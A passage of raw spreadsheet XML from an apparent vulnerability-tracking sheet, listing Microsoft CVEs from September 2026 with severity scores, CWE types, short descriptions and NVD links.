microsoft:office_2024, microsoft:powerpoint</t></is></c><c r="L180" s="5" t="inlineStr" /><c r="M180" s="5" t="inlineStr" /><c r="N180" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O180" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P180" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q180" s="5" t="inlineStr" /><c r="R180" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S180" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T180" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69767</t></is></c></row><row r="181"><c r="A181" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B181" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C181" s="5" t="inlineStr"><is><t>CVE-2026-69772</t></is></c><c r="D181" s="5" t="n"><v>8.800000000000001</v></c><c r="E181" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F181" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G181" s="5" t="inlineStr" /><c r="H181" s="5" t="n"><v>0.008</v></c><c r="I181" s="5" t="inlineStr" /><c r="J181" s="5" t="inlineStr" /><c r="K181" s="5" t="inlineStr" /><c r="L181" s="5" t="inlineStr" /><c r="M181" s="5" t="inlineStr" /><c r="N181" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O181" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P181" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q181" s="5" t="inlineStr" /><c r="R181" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S181" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Network File System allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T181" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69772</t></is></c></row><row r="182"><c r="A182" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B182" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C182" s="5" t="inlineStr"><is><t>CVE-2026-69778</t></is></c><c r="D182" s="5" t="n"><v>8.800000000000001</v></c><c r="E182" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F182" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G182" s="5" t="inlineStr" /><c r="H182" s="5" t="n"><v>0.008</v></c><c r="I182" s="5" t="inlineStr" /><c r="J182" s="5" t="inlineStr" /><c r="K182" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:access, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L182" s="5" t="inlineStr" /><c r="M182" s="5" t="inlineStr" /><c r="N182" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O182" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P182" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q182" s="5" t="inlineStr" /><c r="R182" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S182" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Access allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T182" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69778</t></is></c></row><row r="183"><c r="A183" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B183" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C183" s="5" t="inlineStr"><is><t>CVE-2026-69784</t></is></c><c r="D183" s="5" t="n"><v>8.800000000000001</v></c><c r="E183" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F183" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G183" s="5" t="inlineStr" /><c r="H183" s="5" t="n"><v>0.003</v></c><c r="I183" s="5" t="inlineStr" /><c r="J183" s="5" t="inlineStr" /><c r="K183" s="5" t="inlineStr" /><c r="L183" s="5" t="inlineStr" /><c r="M183" s="5" t="inlineStr" /><c r="N183" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O183" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P183" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q183" s="5" t="inlineStr" /><c r="R183" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S183" s="5" t="inlineStr"><is><t>Use after free in Windows Hello allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T183" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69784</t></is></c></row><row r="184"><c r="A184" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B184" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C184" s="5" t="inlineStr"><is><t>CVE-2026-69797</t></is></c><c r="D184" s="5" t="n"><v>8.800000000000001</v></c><c r="E184" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F184" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G184" s="5" t="inlineStr" /><c r="H184" s="5" t="n"><v>0.008</v></c><c r="I184" s="5" t="inlineStr" /><c r="J184" s="5" t="inlineStr" /><c r="K184" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t></is></c><c r="L184" s="5" t="inlineStr" /><c r="M184" s="5" t="inlineStr" /><c r="N184" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O184" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P184" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q184" s="5" t="inlineStr" /><c r="R184" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S184" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T184" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69797</t></is></c></row><row r="185"><c r="A185" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B185" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C185" s="5" t="inlineStr"><is><t>CVE-2026-69860</t></is></c><c r="D185" s="5" t="n"><v>8.800000000000001</v></c><c r="E185" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F185" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G185" s="5" t="inlineStr" /><c r="H185" s="5" t="n"><v>0.008</v></c><c r="I185" s="5" t="inlineStr" /><c r="J185" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1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5" s="5" t="inlineStr" /><c r="M185" s="5" t="inlineStr" /><c r="N185" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O185" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P185" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q185" s="5" t="inlineStr" /><c r="R185" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S185" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T185" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69860</t></is></c></row><row r="186"><c r="A186" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B186" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C186" s="5" t="inlineStr"><is><t>CVE-2026-70203</t></is></c><c r="D186" s="5" t="n"><v>8.800000000000001</v></c><c r="E186" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F186" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G186" s="5" t="inlineStr" /><c r="H186" s="5" t="n"><v>0.008</v></c><c r="I186" s="5" t="inlineStr" /><c r="J186" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1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6" s="5" t="inlineStr" /><c r="M186" s="5" t="inlineStr" /><c r="N186" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O186" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P186" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q186" s="5" t="inlineStr" /><c r="R186" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S186" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Media Player allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T186" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70203</t></is></c></row><row r="187"><c r="A187" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B187" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C187" s="5" t="inlineStr"><is><t>CVE-2026-70351</t></is></c><c r="D187" s="5" t="n"><v>8.800000000000001</v></c><c r="E187" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F187" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G187" s="5" t="inlineStr" /><c r="H187" s="5" t="n"><v>0.008</v></c><c r="I187" s="5" t="inlineStr" /><c r="J187" s="5" t="inlineStr" /><c r="K187" s="5" t="inlineStr" /><c r="L187" s="5" t="inlineStr" /><c r="M187" s="5" t="inlineStr" /><c r="N187" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O187" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P187" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q187" s="5" t="inlineStr" /><c r="R187" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S187" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Microsoft WebP Image Extension allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T187" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70351</t></is></c></row><row r="188"><c r="A188" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B188" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C188" s="5" t="inlineStr"><is><t>CVE-2026-70586</t></is></c><c r="D188" s="5" t="n"><v>8.800000000000001</v></c><c r="E188" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F188" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G188" s="5" t="inlineStr" /><c r="H188" s="5" t="n"><v>0.008</v></c><c r="I188" s="5" t="inlineStr" /><c r="J188" s="5" t="inlineStr" /><c r="K188" s="5" t="inlineStr" /><c r="L188" s="5" t="inlineStr" /><c r="M188" s="5" t="inlineStr" /><c r="N188" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O188" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P188" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q188" s="5" t="inlineStr" /><c r="R188" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S188" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Paint allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T188" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70586</t></is></c></row><row r="189"><c r="A189" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B189" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C189" s="5" t="inlineStr"><is><t>CVE-2026-71328</t></is></c><c r="D189" s="5" t="n"><v>8.800000000000001</v></c><c r="E189" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F189" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G189" s="5" t="inlineStr" /><c r="H189" s="5" t="n"><v>0.006</v></c><c r="I189" s="5" t="inlineStr" /><c r="J189" s="5" t="inlineStr" /><c r="K189" s="5" t="inlineStr"><is><t>microsoft:.net, microsoft:visual_studio_2022, microsoft:visual_studio_2026, microsoft:windows</t></is></c><c r="L189" s="5" t="inlineStr" /><c r="M189" s="5" t="inlineStr" /><c r="N189" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O189" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P189" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q189" s="5" t="inlineStr" /><c r="R189" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S189" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T189" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71328</t></is></c></row><row r="190"><c r="A190" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B190" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C190" s="5" t="inlineStr"><is><t>CVE-2026-71336</t></is></c><c r="D190" s="5" t="n"><v>8.800000000000001</v></c><c r="E190" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F190" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G190" s="5" t="inlineStr" /><c r="H190" s="5" t="n"><v>0.008999999999999999</v></c><c r="I190" s="5" t="inlineStr" /><c r="J190" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K190" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L190" s="5" t="inlineStr" /><c r="M190" s="5" t="inlineStr" /><c r="N190" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O190" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P190" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q190" s="5" t="inlineStr" /><c r="R190" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S190" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Work Folder Service allows an authorized attacker to execute code over a network.</t></is></c><c r="T190" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71336</t></is></c></row><row r="191"><c r="A191" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B191" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C191" s="5" t="inlineStr"><is><t>CVE-2026-71352</t></is></c><c r="D191" s="5" t="n"><v>8.800000000000001</v></c><c r="E191" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F191" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G191" s="5" t="inlineStr" /><c r="H191" s="5" t="n"><v>0.007</v></c><c r="I191" s="5" t="inlineStr" /><c r="J191" s="5" t="inlineStr" /><c r="K191" s="5" t="inlineStr" /><c r="L191" s="5" t="inlineStr" /><c r="M191" s="5" t="inlineStr" /><c r="N191" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O191" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P191" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q191" s="5" t="inlineStr" /><c r="R191" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="S191" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Windows Remote Access Connection Manager allows an authorized attacker to execute code over a network.</t></is></c><c r="T191" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71352</t></is></c></row><row r="192"><c r="A192" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B192" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C192" s="5" t="inlineStr"><is><t>CVE-2026-72933</t></is></c><c r="D192" s="5" t="n"><v>8.800000000000001</v></c><c r="E192" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F192" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G192" s="5" t="inlineStr" /><c r="H192" s="5" t="n"><v>0.008</v></c><c r="I192" s="5" t="inlineStr" /><c r="J192" s="5" t="inlineStr" /><c r="K192" s="5" t="inlineStr" /><c r="L192" s="5" t="inlineStr" /><c r="M192" s="5" t="inlineStr" /><c r="N192" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O192" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P192" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q192" s="5" t="inlineStr" /><c r="R192" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S192" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft WDAC OLE DB provider for SQL allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T192" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72933</t></is></c></row><row r="193"><c r="A193" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B193" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C193" s="5" t="inlineStr"><is><t>CVE-2026-72940</t></is></c><c r="D193" s="5" t="n"><v>8.800000000000001</v></c><c r="E193" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F193" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G193" s="5" t="inlineStr" /><c r="H193" s="5" t="n"><v>0.008</v></c><c r="I193" s="5" t="inlineStr" /><c r="J193" s="5" t="inlineStr" /><c r="K193" s="5" t="inlineStr" /><c r="L193" s="5" t="inlineStr" /><c r="M193" s="5" t="inlineStr" /><c r="N193" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O193" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P193" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q193" s="5" t="inlineStr" /><c r="R193" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S193" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Schannel allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T193" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72940</t></is></c></row><row r="194"><c r="A194" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B194" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C194" s="5" t="inlineStr"><is><t>CVE-2026-72950</t></is></c><c r="D194" s="5" t="n"><v>8.800000000000001</v></c><c r="E194" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F194" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G194" s="5" t="inlineStr" /><c r="H194" s="5" t="n"><v>0.008999999999999999</v></c><c r="I194" s="5" t="inlineStr" /><c r="J194" s="5" t="inlineStr" /><c r="K194" s="5" t="inlineStr" /><c r="L194" s="5" t="inlineStr" /><c r="M194" s="5" t="inlineStr" /><c r="N194" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O194" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P194" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q194" s="5" t="inlineStr" /><c r="R194" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S194" s="5" t="inlineStr"><is><t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t></is></c><c r="T194" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72950</t></is></c></row><row r="195"><c r="A195" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B195" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C195" s="5" t="inlineStr"><is><t>CVE-2026-72959</t></is></c><c r="D195" s="5" t="n"><v>8.800000000000001</v></c><c r="E195" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F195" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G195" s="5" t="inlineStr" /><c r="H195" s="5" t="n"><v>0.008999999999999999</v></c><c r="I195" s="5" t="inlineStr" /><c r="J195" s="5" t="inlineStr" /><c r="K195" s="5" t="inlineStr" /><c r="L195" s="5" t="inlineStr" /><c r="M195" s="5" t="inlineStr" /><c r="N195" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O195" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P195" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q195" s="5" t="inlineStr" /><c r="R195" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S195" s="5" t="inlineStr"><is><t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t></is></c><c r="T195" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72959</t></is></c></row><row r="196"><c r="A196" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B196" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C196" s="5" t="inlineStr"><is><t>CVE-2026-72960</t></is></c><c r="D196" s="5" t="n"><v>8.800000000000001</v></c><c r="E196" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F196" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G196" s="5" t="inlineStr" /><c r="H196" s="5" t="n"><v>0.008</v></c><c r="I196" s="5" t="inlineStr" /><c r="J196" s="5" t="inlineStr" /><c r="K196" s="5" t="inlineStr" /><c r="L196" s="5" t="inlineStr" /><c r="M196" s="5" t="inlineStr" /><c r="N196" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O196" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P196" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q196" s="5" t="inlineStr" /><c r="R196" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S196" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Media Player allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T196" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72960</t></is></c></row><row r="197"><c r="A197" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B197" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C197" s="5" t="inlineStr"><is><t>CVE-2026-72972</t></is></c><c r="D197" s="5" t="n"><v>8.800000000000001</v></c><c r="E197" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F197" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G197" s="5" t="inlineStr" /><c r="H197" s="5" t="n"><v>0.008</v></c><c r="I197" s="5" t="inlineStr" /><c r="J197" s="5" t="inlineStr" /><c r="K197" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L197" s="5" t="inlineStr" /><c r="M197" s="5" t="inlineStr" /><c r="N197" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O197" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P197" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q197" s="5" t="inlineStr" /><c r="R197" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S197" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T197" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72972</t></is></c></row><row r="198"><c r="A198" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B198" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C198" s="5" t="inlineStr"><is><t>CVE-2026-72973</t></is></c><c r="D198" s="5" t="n"><v>8.800000000000001</v></c><c r="E198" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F198" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G198" s="5" t="inlineStr" /><c r="H198" s="5" t="n"><v>0.008</v></c><c r="I198" s="5" t="inlineStr" /><c r="J198" s="5" t="inlineStr" /><c r="K198" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L198" s="5" t="inlineStr" /><c r="M198" s="5" t="inlineStr" /><c r="N198" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O198" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P198" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q198" s="5" t="inlineStr" /><c r="R198" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S198" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T198" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72973</t></is></c></row><row r="199"><c r="A199" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B199" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C199" s="5" t="inlineStr"><is><t>CVE-2026-72986</t></is></c><c r="D199" s="5" t="n"><v>8.800000000000001</v></c><c r="E199" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F199" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G199" s="5" t="inlineStr" /><c r="H199" s="5" t="n"><v>0.008</v></c><c r="I199" s="5" t="inlineStr" /><c r="J199" s="5" t="inlineStr" /><c r="K199" s="5" t="inlineStr" /><c r="L199" s="5" t="inlineStr" /><c r="M199" s="5" t="inlineStr" /><c r="N199" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O199" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P199" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q199" s="5" t="inlineStr" /><c r="R199" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S199" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Graphic Fonts allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T199" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72986</t></is></c></row><row r="200"><c r="A200" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B200" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C200" s="5" t="inlineStr"><is><t>CVE-2026-73006</t></is></c><c r="D200" s="5" t="n"><v>8.800000000000001</v></c><c r="E200" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F200" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G200" s="5" t="inlineStr" /><c r="H200" s="5" t="n"><v>0.008</v></c><c r="I200" s="5" t="inlineStr" /><c r="J200" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K2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200" s="5" t="inlineStr" /><c r="M200" s="5" t="inlineStr" /><c r="N200" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O200" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P200" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q200" s="5" t="inlineStr" /><c r="R200" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S200" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T200" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73006</t></is></c></row><row r="201"><c r="A201" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B201" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C201" s="5" t="inlineStr"><is><t>CVE-2026-73012</t></is></c><c r="D201" s="5" t="n"><v>8.800000000000001</v></c><c r="E201" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F201" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G201" s="5" t="inlineStr" /><c r="H201" s="5" t="n"><v>0.006</v></c><c r="I201" s="5" t="inlineStr" /><c r="J201" s="5" t="inlineStr" /><c r="K201" s="5" t="inlineStr" /><c r="L201" s="5" t="inlineStr" /><c r="M201" s="5" t="inlineStr" /><c r="N201" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O201" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P201" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q201" s="5" t="inlineStr" /><c r="R201" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S201" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Management Services allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T201" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73012</t></is></c></row><row r="202"><c r="A202" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B202" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C202" s="5" t="inlineStr"><is><t>CVE-2026-73013</t></is></c><c r="D202" s="5" t="n"><v>8.800000000000001</v></c><c r="E202" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F202" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G202" s="5" t="inlineStr" /><c r="H202" s="5" t="n"><v>0.006</v></c><c r="I202" s="5" t="inlineStr" /><c r="J202" s="5" t="inlineStr" /><c r="K202" s="5" t="inlineStr" /><c r="L202" s="5" t="inlineStr" /><c r="M202" s="5" t="inlineStr" /><c r="N202" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O202" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P202" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q202" s="5" t="inlineStr" /><c 